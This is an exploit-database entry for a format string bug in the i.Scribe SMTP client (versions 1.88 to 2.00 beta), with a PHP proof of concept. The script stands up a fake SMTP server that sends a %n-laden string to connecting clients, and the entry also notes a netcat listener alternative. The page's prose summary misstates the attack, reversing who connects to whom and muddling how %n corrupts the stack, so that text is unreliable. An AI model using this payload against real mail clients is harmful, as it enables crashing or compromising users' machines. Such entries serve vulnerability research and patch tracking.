header-logo
Suggest Exploit
vendor:
i.Scribe smtp client
by:
Alfons Luja
7.5
CVSS
HIGH
Format String (wscanf) bug
134
CWE
Product Name: i.Scribe smtp client
Affected Version From: 1.88
Affected Version To: 2.00 beta
Patch Exists: Yes
Related CWE: N/A
CPE: a:memecode:iscribe_smtp_client
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

i.Scribe smtp client v 1.88 to 2.00 beta Format String (wscanf) bug p0c

This vulnerability is a Format String (wscanf) bug in i.Scribe smtp client v 1.88 to 2.00 beta. It allows an attacker to execute arbitrary code on the vulnerable system. The attacker must first enable the php_sockets.dll extension in php.ini or open a netcat listener on port 25. The attacker then connects to the vulnerable system using the i.Scribe smtp client and sends a malicious string containing the %n format specifier. This will cause the vulnerable system to write the address of the stack frame to the stack, allowing the attacker to overwrite the return address and execute arbitrary code.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of i.Scribe smtp client.
Source

Exploit-DB raw data:

<?php 
//I dont have c lol
/*___=++++++++++++__=--=________*****
 0-- 
  --  i.Scribe smtp client v 1.88 to 2.00 beta
      Format String (wscanf) bug p0c
      vendor : Memecode Software 
      grTs;SiD.psycho 
      A.Luja 27.11.08  

--)(________++++++++++++++++++++---*** 

___00)_- NOTE!!! you must enabled extension=php_sockets.dll in php.ini ___==
          Or just open nc -l -p 25 lol*/
$host= $_SERVER[SERVER_ADDR];
$port= 25;
$ret = "AAAA%n%n%n%n%n%n%n%n%n";
$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die ("socket error\n"); 
$bind = socket_bind ($socket, $host, $port) or die ("bind error\n"); 
$listen = socket_listen($socket,1) or die("listen error\n");
printf("--==Fake smtp server ready==----\n");
printf("Now connect here witch iScribe client\n");
if(($acp=socket_accept($socket))!==false){
    printf("Target connected\n");
    sleep(2);
    printf("send evil char\n");
    $hello=socket_write($acp,$ret,strlen($ret));  
    printf("done\n");
    socket_close($acp);
}
socket_close($socket);
exit();
?>

//Alfons Luja

# milw0rm.com [2008-11-27]

Navigation

Suggest Exploit

Services By CQR